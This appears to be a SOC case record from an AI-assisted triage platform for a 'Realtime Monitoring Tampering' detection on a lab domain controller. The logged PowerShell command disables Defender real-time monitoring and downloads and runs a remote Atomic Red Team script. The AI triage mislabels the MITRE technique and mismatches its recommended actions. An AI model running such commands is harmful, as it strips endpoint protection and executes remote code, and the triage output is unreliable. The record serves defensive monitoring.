โ
Case #502
general.RealTime Monitoring Tampering
๐ท๏ธ Analyst Verdict Classification
SUSPICIOUS by analyst๐ค AI Analysis
๐ Detections (1)
Realtime Monitoring Tampering
high
Rule: general.RealTime Monitoring Tampering
Hostname: df-labsdc01.dflabs.local ยท Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 90% ยท Verdict: suspicious
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1552.001 -CheckPrereqs ; Invoke-AtomicTest T1552.001 -GetPrereqs ; Invoke-AtomicTest T1552.001
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
238641152
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pldDCD7.tmp.bat T1552.001 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4489216, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 9164, 'THIS_ATOM': '2eddc57635edafdc772cd43169c2a851', 'THREADS': 3, 'TIMESTAMP': 1774364752869, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
9164
PROCESS_ID:
2584
THREADS:
31
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
{'type': 'command_line', 'value': "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)"}
{'type': 'url', 'value': 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1'}
{'type': 'technique', 'value': 'T1552.001 (Exploit Public-Facing Application)'}
MITRE:
T1552.001
T1059.004
T1567.003
Analyst Declaration:
๐ Raw Detection JSON
{
"author": "ckeller@fusioncybersecurity.us",
"cat": "Realtime Monitoring Tampering",
"detect": {
"event": {
"BASE_ADDRESS": 140694944940032,
"COMMAND_LINE": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1552.001 -CheckPrereqs ; Invoke-AtomicTest T1552.001 -GetPrereqs ; Invoke-AtomicTest T1552.001 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 238641152,
"PARENT": {
"BASE_ADDRESS": 140698856259584,
"COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldDCD7.tmp.bat T1552.001 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
"HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
"MEMORY_USAGE": 4489216,
"PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
"PARENT_PROCESS_ID": 3496,
"PROCESS_ID": 9164,
"THIS_ATOM": "2eddc57635edafdc772cd43169c2a851",
"THREADS": 3,
"TIMESTAMP": 1774364752869,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"PARENT_PROCESS_ID": 9164,
"PROCESS_ID": 2584,
"THREADS": 31,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"routing": {
"arch": 2,
"did": "",
"event_id": "6741a4a8-eb86-4026-9e1a-0da01f2f48fe",
"event_time": 1774364753471,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 3256,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "2eddc57635edafdc772cd43169c2a851",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "0faf1760d8bf36ee150fa36d69c2a853"
}
},
"detect_id": "2397328e-fee4-443e-8ca6-1a4169c2a854",
"gen_time": 1774364756732,
"link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364753\u0026selected=0faf1760d8bf36ee150fa36d69c2a853",
"namespace": "general",
"routing": {
"arch": 2,
"did": "",
"event_id": "6741a4a8-eb86-4026-9e1a-0da01f2f48fe",
"event_time": 1774364753471,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 3256,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "2eddc57635edafdc772cd43169c2a851",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "0faf1760d8bf36ee150fa36d69c2a853"
},
"source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
"source_rule": "general.RealTime Monitoring Tampering",
"ts": 1774364756000
}
๐ Threat Intel JSON
{
"virustotal": {
"malicious": false,
"provider": "virustotal",
"reputation": 73,
"stats": {
"confirmed-timeout": 0,
"failure": 0,
"harmless": 0,
"malicious": 0,
"suspicious": 0,
"timeout": 0,
"type-unsupported": 4,
"undetected": 72
}
}
}
๐ค Triage JSON
{
"confidence": 0.9,
"false_positive_reason": null,
"investigation_questions": [
"What other processes were spawned by the parent cmd.exe process?",
"Are there any scheduled tasks or startup items modified on this host?",
"Was this SYSTEM account activity authorized through legitimate management tools?",
"What is the network traffic pattern associated with this PowerShell session?"
],
"ioc_analysis": "The process is running from its expected location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and is Microsoft-signed, which creates a false positive scenario for the file path itself. However, the command line arguments reveal malicious intent: disabling real-time monitoring, executing Invoke-Expression with an external URL, and installing Atomic Red Team tools. The parent process chain shows cmd.exe spawning PowerShell, indicating a deliberate attack chain rather than legitimate system maintenance.",
"iocs_extracted": [
{
"type": "command_line",
"value": "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)"
},
{
"type": "url",
"value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
},
{
"type": "technique",
"value": "T1552.001 (Exploit Public-Facing Application)"
}
],
"mitre_techniques": [
"T1552.001",
"T1059.004",
"T1567.003"
],
"recommended_actions": [
"Manual analyst review required \u2014 AI models (split)",
"Immediately isolate the host from the network to prevent lateral movement",
"Block all outbound connections to GitHub and raw.githubusercontent.com at the firewall level",
"Review and disable real-time monitoring settings on this endpoint",
"Conduct forensic analysis of PowerShell execution history for this session",
"Check for persistence mechanisms installed during this attack"
],
"risk_score": 88,
"severity": "high",
"summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a highly suspicious PowerShell execution by the SYSTEM account that disables real-time monitoring and downloads malicious payloads from an external GitHub repository. The command line explicitly attempts to bypass security controls and execute code from an untrusted source.\n\n**IOC Analysis:** The process is running from its expected location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and is Microsoft-signed, which creates a false positive scenario for the file path itself. However, the command line arguments reveal malicious intent: disabling real-time monitoring, executing Invoke-Expression with an external URL, and installing Atomic Red Team tools. The parent process chain shows cmd.exe spawning PowerShell, indicating a deliberate attack chain rather than legitimate system maintenance.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.85\nThe detection involves a PowerShell process running from C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe with a malicious command line that disables real-time monitoring and installs potentially malicious tools. Despite the legitimate file path and signed hash, the behavior indicates a high-risk attack.\n\n**IOC Analysis:** FILE_PATH: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is a legitimate Microsoft binary in its expected location, but the command line shows malicious intent. HASH: de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c is signed, but the behavior suggests it may be used for evasion. FILE_IS_SIGNED: 1 indicates a signature, but does not confirm legitimacy in this context.",
"verdict": "suspicious",
"voting": {
"auto_action": "manual_review",
"mode": "split",
"total_models": 2,
"vote_summary": [
"qwen3.5:4b: true_positive (critical, 95% confidence)",
"deepseek-r1:8b: suspicious (high, 85% confidence)"
],
"votes": [
{
"confidence": 0.95,
"model": "qwen3.5:4b",
"verdict": "true_positive"
},
{
"confidence": 0.85,
"model": "deepseek-r1:8b",
"verdict": "suspicious"
}
],
"winning_count": 1,
"winning_verdict": "suspicious"
}
}
โ๏ธ Response Actions
| Action | Target | Status | Result | |
|---|---|---|---|---|
| tag | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Lateral Movement Investigation: 50 events found | ||
| recommended | executed | User Activity Investigation: 31 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Persistence Check: 0 events found |
๐ Add Note
๐ฌ Notes (7)
๐ค FusionSOC AI
2026-03-24T16:21
๐ค FusionSOC AI
2026-03-24T16:21
๐ค FusionSOC AI
2026-03-24T16:21
๐ค FusionSOC AI
2026-03-24T16:21
๐ค FusionSOC AI
2026-03-24T16:21
๐ค FusionSOC AI
2026-03-24T16:21
๐ค FusionSOC AI
2026-03-24T16:21
๐ Timeline
2026-03-24T17:30:27
analyst
Status changed: investigating โ closed
2026-03-24T17:30:23
analyst
Analyst classified as Suspicious (SUSPICIOUS)
2026-03-24T16:21:45
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:21:45
FusionSOC
Action recommended โ executed: Persistence Check: 0 events found
2026-03-24T16:21:45
FusionSOC AI
Note by FusionSOC AI: ## ๐ Persistence Check **Action:** Check for persistence mechanisms installed during this attack **Sensor:** `e4a1c62d-4...
2026-03-24T16:21:43
FusionSOC
Response action queued: recommended on Check for persistence mechanisms installed during this attack
2026-03-24T16:21:43
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:21:43
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T16:21:43
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Conduct forensic analysis of PowerShell execution history for this session **Sen...
2026-03-24T16:21:43
FusionSOC
Response action queued: recommended on Conduct forensic analysis of PowerShell execution history for this session
2026-03-24T16:21:43
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:21:43
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T16:21:43
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Review and disable real-time monitoring settings on this endpoint **Sensor:** `e...
2026-03-24T16:21:43
FusionSOC
Response action queued: recommended on Review and disable real-time monitoring settings on this endpoint
2026-03-24T16:21:43
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:21:43
FusionSOC
Action recommended โ executed: User Activity Investigation: 31 events found
2026-03-24T16:21:43
FusionSOC AI
Note by FusionSOC AI: ## ๐ User Activity Investigation **Action:** Block all outbound connections to GitHub and raw.githubusercontent.com at t...
2026-03-24T16:21:42
FusionSOC
Response action queued: recommended on Block all outbound connections to GitHub and raw.githubusercontent.com at the firewall level
2026-03-24T16:21:42
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:21:42
FusionSOC
Action recommended โ executed: Lateral Movement Investigation: 50 events found
2026-03-24T16:21:42
FusionSOC AI
Note by FusionSOC AI: ## ๐ Lateral Movement Investigation **Action:** Immediately isolate the host from the network to prevent lateral movemen...
2026-03-24T16:21:41
FusionSOC
Response action queued: recommended on Immediately isolate the host from the network to prevent lateral movement
2026-03-24T16:21:41
FusionSOC AI
Status changed: open โ investigating
2026-03-24T16:21:41
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T16:21:41
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Manual analyst review required โ AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T16:21:40
FusionSOC
Response action queued: recommended on Manual analyst review required โ AI models (split)
2026-03-24T16:21:40
FusionSOC
Action tag โ failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T16:21:40
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T16:21:39
FusionSOC AI
Detection 2397328e-fee4-443e-8ca6-1a4169c2a854 triaged as suspicious (high severity, confidence: 90%)
2026-03-24T16:21:39
FusionSOC AI
Case created from detection: general.RealTime Monitoring Tampering